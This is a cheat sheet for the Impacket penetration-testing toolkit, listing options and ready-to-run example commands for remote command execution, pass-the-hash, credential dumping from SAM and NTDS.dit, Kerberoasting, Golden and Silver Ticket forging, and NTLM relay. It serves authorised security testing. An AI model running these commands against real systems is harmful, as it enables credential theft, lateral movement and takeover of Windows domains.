Impacket Toolkit Cheat Sheet¶

Overview¶

Impacket is a collection of Python classes for working with network protocols. It provides low-level programmatic access to packets and implements several protocols including SMB, MSRPC, and Kerberos. Impacket includes numerous ready-to-use tools for penetration testing, particularly focused on Windows environments.

⚠️ Warning: Impacket is a security testing tool that should only be used in environments where you have explicit permission to do so.

Installation¶

From PyPI¶

pip install impacket

From GitHub¶

git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

On Kali Linux¶

sudo apt update
sudo apt install -y python3-impacket

Using Virtual Environment¶

# Create and activate virtual environment
python -m venv impacket-env
source impacket-env/bin/activate  # Linux/macOS
impacket-env\Scripts\activate.bat  # Windows

# Install Impacket
pip install impacket

Command Execution Tools¶

psexec.py¶

Executes commands on remote Windows systems using the SMB protocol, similar to SysInternals' PsExec.

Basic Usage¶

psexec.py [domain/]username[:password]@target [options] [command]

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-k`	Use Kerberos authentication
`-no-pass`	Don't ask for password (useful for Kerberos)
`-port [port]`	Connect to SMB Server port (default: 445)
`-debug`	Turn DEBUG output ON

Examples¶

# Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe

# Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe

# Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe

smbexec.py¶

Similar to psexec.py but uses different techniques to execute commands, making it potentially stealthier.

Basic Usage¶

smbexec.py [domain/]username[:password]@target [options]

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-share SHARE`	Share where the output will be grabbed from (default: ADMIN$)
`-shell-type \\{cmd,powershell\\}`	Shell type to use (default: cmd)
`-codec CODEC`	Sets encoding used (codec) from the target's output (default: UTF-8)
`-service-name NAME`	Service name to use (default: random)

Examples¶

# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100

wmiexec.py¶

Executes commands on remote Windows systems using WMI.

Basic Usage¶

wmiexec.py [domain/]username[:password]@target [options] [command]

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-share SHARE`	Share where the output will be grabbed from (default: ADMIN$)
`-silentcommand`	Execute command and return immediately without output
`-codec CODEC`	Sets encoding used (codec) from the target's output (default: UTF-8)
`-shell-type \\{cmd,powershell\\}`	Shell type to use (default: cmd)

Examples¶

# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100

# Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

dcomexec.py¶

Executes commands on remote Windows systems using DCOM objects.

Basic Usage¶

dcomexec.py [domain/]username[:password]@target [options] [command]

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-object \\{ShellWindows,ShellBrowserWindow,MMC20\\}`	DCOM object to use (default: MMC20.Application)
`-silentcommand`	Execute command and return immediately without output
`-codec CODEC`	Sets encoding used (codec) from the target's output (default: UTF-8)
`-shell-type \\{cmd,powershell\\}`	Shell type to use (default: cmd)

Examples¶

# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100

# Execute with specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

atexec.py¶

Executes commands on remote Windows systems using the Task Scheduler service.

Basic Usage¶

atexec.py [domain/]username[:password]@target [options] command

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-silentcommand`	Execute command and return immediately without output
`-codec CODEC`	Sets encoding used (codec) from the target's output (default: UTF-8)

Examples¶

# Execute command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Execute command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Use hash instead of password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

Credential Dumping Tools¶

secretsdump.py¶

Extracts credentials from a remote Windows system, including SAM, LSA Secrets, and NTDS.dit.

Basic Usage¶

secretsdump.py [domain/]username[:password]@target [options]

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-just-dc`	Extract only NTDS.DIT data (domain controller only)
`-just-dc-ntlm`	Extract only NTDS.DIT NTLM hashes (domain controller only)
`-just-dc-user USER`	Extract only NTDS.DIT data for specific user
`-pwd-last-set`	Shows pwdLastSet attribute for each NTDS.DIT account
`-user-status`	Shows whether the user is enabled or disabled
`-history`	Dump password history
`-outputfile FILE`	Write output to file

Examples¶

# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100

# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100

# Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL

# Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100

Kerberos Attack Tools¶

GetNPUsers.py¶

Retrieves password hashes for users with "Do not require Kerberos preauthentication" set (ASREPRoast attack).

Basic Usage¶

GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]

Common Options¶

Option	Description
`-request`	Requests TGT for users and output them in JtR/hashcat format
`-no-pass`	Don't ask for password (useful for Kerberos)
`-k`	Use Kerberos authentication
`-dc-ip IP`	IP Address of the domain controller
`-usersfile FILE`	File with user per line to test
`-format \\{hashcat,john\\}`	Format to save the AS_REP responses (default: hashcat)
`-outputfile FILE`	Output filename to write ciphers in JtR/hashcat format

Examples¶

# Get users without Kerberos preauthentication with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request

# Get users without Kerberos preauthentication for specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1

# Get users without Kerberos preauthentication for all users in domain
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat

# Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass

GetUserSPNs.py¶

Retrieves Service Principal Names (SPNs) for accounts in the domain (Kerberoasting attack).

Basic Usage¶

GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]

Common Options¶

Option	Description
`-request`	Requests TGS for users and output them in JtR/hashcat format
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-dc-ip IP`	IP Address of the domain controller
`-target-user USER`	Target specific user to request TGS for
`-outputfile FILE`	Output filename to write ciphers in JtR/hashcat format
`-format \\{hashcat,john\\}`	Format to save the TGS tickets (default: hashcat)

Examples¶

# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request

# Get SPNs for specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -target-user sqlservice

# Output hashes in specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat

# Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request

ticketer.py¶

Creates Golden and Silver Tickets for Kerberos authentication.

Basic Usage¶

ticketer.py [options] username

Common Options¶

Option	Description
`-nthash HASH`	NT hash for the user or service account
`-aesKey KEY`	AES key for the user or service account
`-domain DOMAIN`	Domain name
`-domain-sid SID`	Domain SID
`-spn SPN`	Service Principal Name (for Silver Tickets)
`-groups IDS`	Comma-separated list of group IDs to include in the ticket
`-duration HOURS`	Ticket duration in hours (default: 10)
`-out FILE`	Output filename to save the ticket

Examples¶

# Create Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator

# Create Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator

# Specify output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator

Network Protocols Tools¶

smbclient.py¶

Provides an SMB client to access shares and files on remote systems.

Basic Usage¶

smbclient.py [domain/]username[:password]@target [options]

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-port [port]`	Connect to SMB Server port (default: 445)
`-file FILE`	Input file with commands to execute in the mini shell
`-debug`	Turn DEBUG output ON

Common Commands (Interactive Shell)¶

Command	Description
`help`	Show available commands
`shares`	List available shares
`use <share>`	Connect to a specific share
`ls`	List files in current directory
`cd <dir>`	Change directory
`get <file>`	Download file
`put <file>`	Upload file
`rm <file>`	Delete file
`mkdir <dir>`	Create directory
`rmdir <dir>`	Remove directory
`exit`	Exit the shell

Examples¶

# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100

# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

mssqlclient.py¶

Provides a client to interact with Microsoft SQL Server instances.

Basic Usage¶

mssqlclient.py [domain/]username[:password]@target [options]

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-windows-auth`	Use Windows Authentication (default: False)
`-port [port]`	Destination port to connect to (default: 1433)
`-db DATABASE`	MSSQL database instance (default: None)
`-file FILE`	Input file with commands to execute in the SQL shell
`-debug`	Turn DEBUG output ON

Common Commands (Interactive Shell)¶

Command	Description
`help`	Show available commands
`enable_xp_cmdshell`	Enable the xp_cmdshell stored procedure
`disable_xp_cmdshell`	Disable the xp_cmdshell stored procedure
`xp_cmdshell <command>`	Execute command through xp_cmdshell
`sp_start_job <job>`	Start a SQL Server job
`exit`	Exit the shell

Examples¶

# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100

# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100

# Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth

Other Useful Tools¶

ntlmrelayx.py¶

Performs NTLM Relay attacks.

Basic Usage¶

ntlmrelayx.py [options]

Common Options¶

Option	Description
`-t TARGET`	Target to relay the credentials to
`-tf FILE`	File with targets to relay the credentials to
`-w`	Start the HTTP server and do not relay credentials
`-e FILE`	Execute this file when a connection is relayed
`-c COMMAND`	Execute this command when a connection is relayed
`-smb2support`	Enable SMB2 support
`-socks`	Launch a SOCKS proxy for the connection
`-one-shot`	Relay only one connection
`-debug`	Turn DEBUG output ON

Examples¶

# Relay to specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support

# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support

# Execute command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\\temp\\whoami.txt"

# Dump SAM database on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -d

# Start SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks

lookupsid.py¶

Performs SID lookups to enumerate users and groups.

Basic Usage¶

lookupsid.py [domain/]username[:password]@target [options]

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-domain DOMAIN`	Domain to enumerate (default: target domain)
`-debug`	Turn DEBUG output ON

Examples¶

# Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100

# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

reg.py¶

Provides a remote registry manipulation tool.

Basic Usage¶

reg.py [domain/]username[:password]@target [options] action [params]

Common Options¶

Option	Description
`-hashes LMHASH:NTHASH`	Use NTLM hashes instead of password (Pass-the-Hash)
`-debug`	Turn DEBUG output ON

Actions¶

Action	Description
`query`	Query a registry key or value
`add`	Add a registry key or value
`delete`	Delete a registry key or value
`save`	Save a registry hive to a file

Examples¶

# Query registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\\SOFTWARE\\Test -v TestValue -vt REG_SZ -vd "Test Data"

# Delete registry key with hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\\SOFTWARE\\Test

Common Parameters Across Tools¶

Parameter	Description
`-h, --help`	Show help message and exit
`-debug`	Turn DEBUG output ON
`-hashes LMHASH:NTHASH`	NTLM hashes, format is LMHASH:NTHASH
`-no-pass`	Don't ask for password (useful for Kerberos)
`-k`	Use Kerberos authentication
`-aesKey KEY`	AES key to use for Kerberos authentication
`-dc-ip IP`	IP Address of the domain controller
`-target-ip IP`	IP Address of the target machine
`-port [port]`	Destination port to connect to

Impacket Toolkit Cheat Sheet¶

Overview¶

Installation¶

From PyPI¶

From GitHub¶

On Kali Linux¶

Using Virtual Environment¶

Command Execution Tools¶

psexec.py¶

Basic Usage¶

Common Options¶

Examples¶

smbexec.py¶

Basic Usage¶

Common Options¶

Examples¶

wmiexec.py¶

Basic Usage¶

Common Options¶

Examples¶

dcomexec.py¶

Basic Usage¶

Common Options¶

Examples¶

atexec.py¶

Basic Usage¶

Common Options¶

Examples¶

Credential Dumping Tools¶

secretsdump.py¶

Basic Usage¶

Common Options¶

Examples¶

Kerberos Attack Tools¶

GetNPUsers.py¶

Basic Usage¶

Common Options¶

Examples¶

GetUserSPNs.py¶

Basic Usage¶

Common Options¶

Examples¶

ticketer.py¶

Basic Usage¶

Common Options¶

Examples¶

Network Protocols Tools¶

smbclient.py¶

Basic Usage¶

Common Options¶

Common Commands (Interactive Shell)¶

Examples¶

mssqlclient.py¶

Basic Usage¶

Common Options¶

Common Commands (Interactive Shell)¶

Examples¶

Other Useful Tools¶

ntlmrelayx.py¶

Basic Usage¶

Common Options¶

Examples¶

lookupsid.py¶

Basic Usage¶

Common Options¶

Examples¶

reg.py¶

Basic Usage¶

Common Options¶

Actions¶

Examples¶

Common Parameters Across Tools¶

Resources¶